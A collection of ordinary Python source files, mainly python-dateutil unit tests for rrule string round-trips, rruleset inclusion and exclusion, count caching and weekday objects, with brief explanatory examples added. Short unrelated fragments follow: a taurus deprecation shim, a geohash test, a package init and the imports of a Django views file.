self._rrulestr_reverse_test(rrule(HOURLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDay(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByEaster(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHour(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMinute(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyBySecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrHourlyBySetPos(self):
self._rrulestr_reverse_test(rrule(HOURLY,
count=3,
byminute=(15, 45),
bysecond=(15, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutely(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyInterval(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
interval=1501,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonth(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByYearDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNo(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByEaster(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByEasterPos(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHour(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMinute(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyBySecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMinutelyBySetPos(self):
self._rrulestr_reverse_test(rrule(MINUTELY,
count=3,
bysecond=(15, 30, 45),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondly(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyInterval(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
interval=90061,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonth(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByYearDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDay(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByEaster(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHour(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMinute(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyBySecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrSecondlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(SECONDLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
    def testToStrSecondlyByHourAndMinuteAndSecondBug(self):
        # This explores a bug found by Mathieu Bridon.
        self._rrulestr_reverse_test(rrule(SECONDLY,
                                          count=3,
                                          bysecond=(0,),
                                          byminute=(1,),
                                          dtstart=datetime(2010, 3, 22, 12, 1)))

    def testToStrWithWkSt(self):
        self._rrulestr_reverse_test(rrule(WEEKLY,
                                          count=3,
                                          wkst=SU,
                                          dtstart=datetime(1997, 9, 2, 9, 0)))

    def testToStrLongIntegers(self):
        if not PY3:  # There are no longs in Python 3
            self._rrulestr_reverse_test(rrule(MINUTELY,
                                              count=long(2),
                                              interval=long(2),
                                              bymonth=long(2),
                                              byweekday=long(3),
                                              byhour=long(6),
                                              byminute=long(6),
                                              bysecond=long(6),
                                              dtstart=datetime(1997, 9, 2, 9, 0)))

            self._rrulestr_reverse_test(rrule(YEARLY,
                                              count=long(2),
                                              bymonthday=long(5),
                                              byweekno=long(2),
                                              dtstart=datetime(1997, 9, 2, 9, 0)))
    def testReplaceIfSet(self):
        rr = rrule(YEARLY,
                   count=1,
                   bymonthday=5,
                   dtstart=datetime(1997, 1, 1))
        newrr = rr.replace(bymonthday=6)
        self.assertEqual(list(rr), [datetime(1997, 1, 5)])
        self.assertEqual(list(newrr), [datetime(1997, 1, 6)])

    def testReplaceIfNotSet(self):
        rr = rrule(YEARLY,
                   count=1,
                   dtstart=datetime(1997, 1, 1))
        newrr = rr.replace(bymonthday=6)
        self.assertEqual(list(rr), [datetime(1997, 1, 1)])
        self.assertEqual(list(newrr), [datetime(1997, 1, 6)])
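The two tests above pin down the semantics of `rrule.replace`: it hands back a new rule with the named parameters swapped in — whether or not they were set on the source rule — and leaves the original untouched. A minimal standalone sketch (assuming `python-dateutil` 2.6+ is installed):

```python
from datetime import datetime
from dateutil.rrule import rrule, YEARLY

# One occurrence: the first January 5th on or after dtstart.
base = rrule(YEARLY, count=1, bymonthday=5, dtstart=datetime(1997, 1, 1))

# replace() builds a brand-new rrule; `base` itself is unchanged.
shifted = base.replace(bymonthday=6)

print(list(base))     # [datetime.datetime(1997, 1, 5, 0, 0)]
print(list(shifted))  # [datetime.datetime(1997, 1, 6, 0, 0)]
```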
class RRuleSetTest(unittest.TestCase):
    def testSet(self):
        rrset = rruleset()
        rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 4, 9, 0),
                          datetime(1997, 9, 9, 9, 0)])

    def testSetDate(self):
        rrset = rruleset()
        rrset.rrule(rrule(YEARLY, count=1, byweekday=TU,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.rdate(datetime(1997, 9, 4, 9))
        rrset.rdate(datetime(1997, 9, 9, 9))
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 4, 9, 0),
                          datetime(1997, 9, 9, 9, 0)])
    def testSetExRule(self):
        rrset = rruleset()
        rrset.rrule(rrule(YEARLY, count=6, byweekday=(TU, TH),
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.exrule(rrule(YEARLY, count=3, byweekday=TH,
                           dtstart=datetime(1997, 9, 2, 9, 0)))
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 9, 9, 0),
                          datetime(1997, 9, 16, 9, 0)])

    def testSetExDate(self):
        rrset = rruleset()
        rrset.rrule(rrule(YEARLY, count=6, byweekday=(TU, TH),
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.exdate(datetime(1997, 9, 4, 9))
        rrset.exdate(datetime(1997, 9, 11, 9))
        rrset.exdate(datetime(1997, 9, 18, 9))
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 9, 9, 0),
                          datetime(1997, 9, 16, 9, 0)])

    def testSetExDateRevOrder(self):
        rrset = rruleset()
        rrset.rrule(rrule(MONTHLY, count=5, bymonthday=10,
                          dtstart=datetime(2004, 1, 1, 9, 0)))
        rrset.exdate(datetime(2004, 4, 10, 9, 0))
        rrset.exdate(datetime(2004, 2, 10, 9, 0))
        self.assertEqual(list(rrset),
                         [datetime(2004, 1, 10, 9, 0),
                          datetime(2004, 3, 10, 9, 0),
                          datetime(2004, 5, 10, 9, 0)])

    def testSetDateAndExDate(self):
        rrset = rruleset()
        rrset.rdate(datetime(1997, 9, 2, 9))
        rrset.rdate(datetime(1997, 9, 4, 9))
        rrset.rdate(datetime(1997, 9, 9, 9))
        rrset.rdate(datetime(1997, 9, 11, 9))
        rrset.rdate(datetime(1997, 9, 16, 9))
        rrset.rdate(datetime(1997, 9, 18, 9))
        rrset.exdate(datetime(1997, 9, 4, 9))
        rrset.exdate(datetime(1997, 9, 11, 9))
        rrset.exdate(datetime(1997, 9, 18, 9))
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 9, 9, 0),
                          datetime(1997, 9, 16, 9, 0)])

    def testSetDateAndExRule(self):
        rrset = rruleset()
        rrset.rdate(datetime(1997, 9, 2, 9))
        rrset.rdate(datetime(1997, 9, 4, 9))
        rrset.rdate(datetime(1997, 9, 9, 9))
        rrset.rdate(datetime(1997, 9, 11, 9))
        rrset.rdate(datetime(1997, 9, 16, 9))
        rrset.rdate(datetime(1997, 9, 18, 9))
        rrset.exrule(rrule(YEARLY, count=3, byweekday=TH,
                           dtstart=datetime(1997, 9, 2, 9, 0)))
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 9, 9, 0),
                          datetime(1997, 9, 16, 9, 0)])
    def testSetCount(self):
        rrset = rruleset()
        rrset.rrule(rrule(YEARLY, count=6, byweekday=(TU, TH),
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.exrule(rrule(YEARLY, count=3, byweekday=TH,
                           dtstart=datetime(1997, 9, 2, 9, 0)))
        self.assertEqual(rrset.count(), 3)

    def testSetCachePre(self):
        rrset = rruleset()
        rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 4, 9, 0),
                          datetime(1997, 9, 9, 9, 0)])

    def testSetCachePost(self):
        rrset = rruleset(cache=True)
        rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        for x in rrset:
            pass
        self.assertEqual(list(rrset),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 4, 9, 0),
                          datetime(1997, 9, 9, 9, 0)])

    def testSetCachePostInternal(self):
        rrset = rruleset(cache=True)
        rrset.rrule(rrule(YEARLY, count=2, byweekday=TU,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        rrset.rrule(rrule(YEARLY, count=1, byweekday=TH,
                          dtstart=datetime(1997, 9, 2, 9, 0)))
        for x in rrset:
            pass
        self.assertEqual(list(rrset._cache),
                         [datetime(1997, 9, 2, 9, 0),
                          datetime(1997, 9, 4, 9, 0),
                          datetime(1997, 9, 9, 9, 0)])
    def testSetRRuleCount(self):
        # Test that the count is updated when an rrule is added
        for cache in (True, False):
            rrset = rruleset(cache=cache)
            rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
                              dtstart=datetime(1983, 4, 1)))
            rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
                              dtstart=datetime(1991, 6, 3)))

            # Check the length twice - first one sets a cache, second reads it
            self.assertEqual(rrset.count(), 6)
            self.assertEqual(rrset.count(), 6)

            # This should invalidate the cache and force an update
            rrset.rrule(rrule(MONTHLY, count=3, dtstart=datetime(1994, 1, 3)))
            self.assertEqual(rrset.count(), 9)
            self.assertEqual(rrset.count(), 9)

    def testSetRDateCount(self):
        # Test that the count is updated when an rdate is added
        for cache in (True, False):
            rrset = rruleset(cache=cache)
            rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
                              dtstart=datetime(1983, 4, 1)))
            rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
                              dtstart=datetime(1991, 6, 3)))

            # Check the length twice - first one sets a cache, second reads it
            self.assertEqual(rrset.count(), 6)
            self.assertEqual(rrset.count(), 6)

            # This should invalidate the cache and force an update
            rrset.rdate(datetime(1993, 2, 14))
            self.assertEqual(rrset.count(), 7)
            self.assertEqual(rrset.count(), 7)

    def testSetExRuleCount(self):
        # Test that the count is updated when an exrule is added
        for cache in (True, False):
            rrset = rruleset(cache=cache)
            rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
                              dtstart=datetime(1983, 4, 1)))
            rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
                              dtstart=datetime(1991, 6, 3)))

            # Check the length twice - first one sets a cache, second reads it
            self.assertEqual(rrset.count(), 6)
            self.assertEqual(rrset.count(), 6)

            # This should invalidate the cache and force an update
            rrset.exrule(rrule(WEEKLY, count=2, interval=2,
                               dtstart=datetime(1991, 6, 14)))
            self.assertEqual(rrset.count(), 4)
            self.assertEqual(rrset.count(), 4)

    def testSetExDateCount(self):
        # Test that the count is updated when an exdate is added
        for cache in (True, False):
            rrset = rruleset(cache=cache)
            rrset.rrule(rrule(YEARLY, count=2, byweekday=TH,
                              dtstart=datetime(1983, 4, 1)))
            rrset.rrule(rrule(WEEKLY, count=4, byweekday=FR,
                              dtstart=datetime(1991, 6, 3)))

            # Check the length twice - first one sets a cache, second reads it
            self.assertEqual(rrset.count(), 6)
            self.assertEqual(rrset.count(), 6)

            # This should invalidate the cache and force an update
            rrset.exdate(datetime(1991, 6, 28))
            self.assertEqual(rrset.count(), 5)
            self.assertEqual(rrset.count(), 5)
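The four tests above all follow the same pattern: `rruleset.count()` caches its result, and adding an rrule, rdate, exrule, or exdate must invalidate that cache. The inclusion/exclusion mechanics they rely on can be sketched on their own (assuming `python-dateutil` is installed):

```python
from datetime import datetime
from dateutil.rrule import rruleset, rrule, WEEKLY, TU, TH

rset = rruleset()
# Tuesdays and Thursdays at 09:00, four occurrences in total.
rset.rrule(rrule(WEEKLY, count=4, byweekday=(TU, TH),
                 dtstart=datetime(1997, 9, 2, 9, 0)))
print(rset.count())   # 4

# exdate() removes a single occurrence; it has to match exactly,
# time included, or nothing is excluded.
rset.exdate(datetime(1997, 9, 4, 9, 0))

print(list(rset))     # 1997-09-02, 1997-09-09 and 1997-09-11, all at 09:00
print(rset.count())   # 3 -- the cached count was invalidated by exdate()
```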
class WeekdayTest(unittest.TestCase):
    def testInvalidNthWeekday(self):
        with self.assertRaises(ValueError):
            FR(0)

    def testWeekdayCallable(self):
        # Calling a weekday instance generates a new weekday instance with the
        # value of n changed.
        from dateutil.rrule import weekday
        self.assertEqual(MO(1), weekday(0, 1))

        # Calling a weekday instance with the identical n returns the original
        # object
        FR_3 = weekday(4, 3)
        self.assertIs(FR_3(3), FR_3)

    def testWeekdayEquality(self):
        # Two weekday objects are not equal if they have different values for n
        self.assertNotEqual(TH, TH(-1))
        self.assertNotEqual(SA(3), SA(2))

    def testWeekdayEqualitySubclass(self):
        # Two weekday objects are equal if their "weekday" and "n" attributes
        # are available and the same
        class BasicWeekday(object):
            def __init__(self, weekday):
                self.weekday = weekday

        class BasicNWeekday(BasicWeekday):
            def __init__(self, weekday, n=None):
                super(BasicNWeekday, self).__init__(weekday)
                self.n = n

        MO_Basic = BasicWeekday(0)
        self.assertNotEqual(MO, MO_Basic)
        self.assertNotEqual(MO(1), MO_Basic)

        TU_BasicN = BasicNWeekday(1)
        self.assertEqual(TU, TU_BasicN)
        self.assertNotEqual(TU(3), TU_BasicN)

        WE_Basic3 = BasicNWeekday(2, 3)
        self.assertEqual(WE(3), WE_Basic3)
        self.assertNotEqual(WE(2), WE_Basic3)

    def testWeekdayReprNoN(self):
        no_n_reprs = ('MO', 'TU', 'WE', 'TH', 'FR', 'SA', 'SU')
        no_n_wdays = (MO, TU, WE, TH, FR, SA, SU)
        for repstr, wday in zip(no_n_reprs, no_n_wdays):
            self.assertEqual(repr(wday), repstr)

    def testWeekdayReprWithN(self):
        with_n_reprs = ('WE(+1)', 'TH(-2)', 'SU(+3)')
        with_n_wdays = (WE(1), TH(-2), SU(+3))
        for repstr, wday in zip(with_n_reprs, with_n_wdays):
            self.assertEqual(repr(wday), repstr)
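The `weekday` behaviors exercised by this class condense into a few standalone checks (assuming `python-dateutil` is installed):

```python
from dateutil.rrule import weekday, MO, FR

# MO, TU, ... are weekday instances with n=None; calling one returns a new
# instance with n set, so MO(1) means "the first Monday".
assert MO(1) == weekday(0, 1)

# Calling with the identical n hands back the very same object.
fr3 = weekday(4, 3)
assert fr3(3) is fr3

# n participates in equality, and a positive n is rendered with a '+' sign.
assert FR != FR(-1)
assert repr(FR(3)) == 'FR(+3)'

# n == 0 is rejected: the "nth weekday" is 1-based in both directions.
raised = False
try:
    FR(0)
except ValueError:
    raised = True
assert raised
```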
# --- lib/taurus/core/tango/search.py (MikeFalowski/taurus, CC-BY-3.0) ---
from taurus.core.util.log import deprecated as __deprecated
__deprecated(dep='taurus.core.tango.search',
             alt='taurus.core.util.fandango_search', rel='4.1.2')
from taurus.core.util.fandango_search import *
# --- tests/test_geohash.py (Marcnuth/geohash, Apache-2.0) ---
from geohash import geohash


def test_hash():
    print(geohash.encode(36, -129, precision=9))
    print(geohash.encode2bin(36, -129))
    print(geohash.decode('9nkkb9954'))
    print(geohash.decode('x1d'))
# --- codes/utils/__init__.py (jecalles/genetic-codes, MIT) ---
from . import definitions
from . import functions
# --- backend/account/views.py (CS178A-B/final-project-bjls, MIT) ---
from django.shortcuts import render, redirect, reverse
from django.contrib.auth import login, logout
from django.http import HttpResponse, JsonResponse
from django.views import View
from django.contrib.auth.mixins import LoginRequiredMixin
from dateutil.relativedelta import relativedelta
from .forms import LoginForm, StudentForm
from .models import User
# from .forms import LoginForm, StudentUpdateForm, StudentForm
from django.contrib import messages
